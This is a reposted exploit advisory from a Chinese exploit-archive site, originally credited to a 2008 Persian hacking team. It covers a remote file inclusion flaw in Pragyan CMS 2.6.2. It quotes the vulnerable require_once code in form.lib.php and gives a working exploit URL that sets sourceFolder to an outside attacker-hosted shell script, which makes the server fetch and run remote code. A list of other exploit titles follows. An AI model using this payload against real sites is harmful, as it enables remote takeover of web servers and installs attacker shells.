手机
当前位置:查字典教程网 >网络安全 >Exploit >Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
摘要:--------------------------------------------------------------[Persian...

<< In The Name Of GOD >>

-------------------------------------------------------------

- [ Persian Boys Hacking Team ] -:- 2008

-

- discovered by N3TR00T3R [at] Y! [dot] com

- pragyan 2.6.2 Remote File Includion

- download :http://sourceforge.net/project/showfiles.php?group_id=220286

- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd

r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser

Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...

[www.Persian-Boys.com] & [www.irchatan.com]

--------------------------------------------------------------

if register_globals = On;

Vul Code : [/cms/modules/form.lib.php]

##########################################################

#global $sourceFolder;

#global $moduleFolder;

#require_once("$sourceFolder/$moduleFolder/form/editform.php");

#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");

#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");

##########################################################

Exploit :

##########################################################

#

# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?

#

##########################################################

【Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability】相关文章:

TGS CMS 0.3.2r2 Remote Code Execution Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Joomla Component EZ Store Remote Blind SQL Injection Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

上一篇: Comdev Web Blogger
精品推荐
分类导航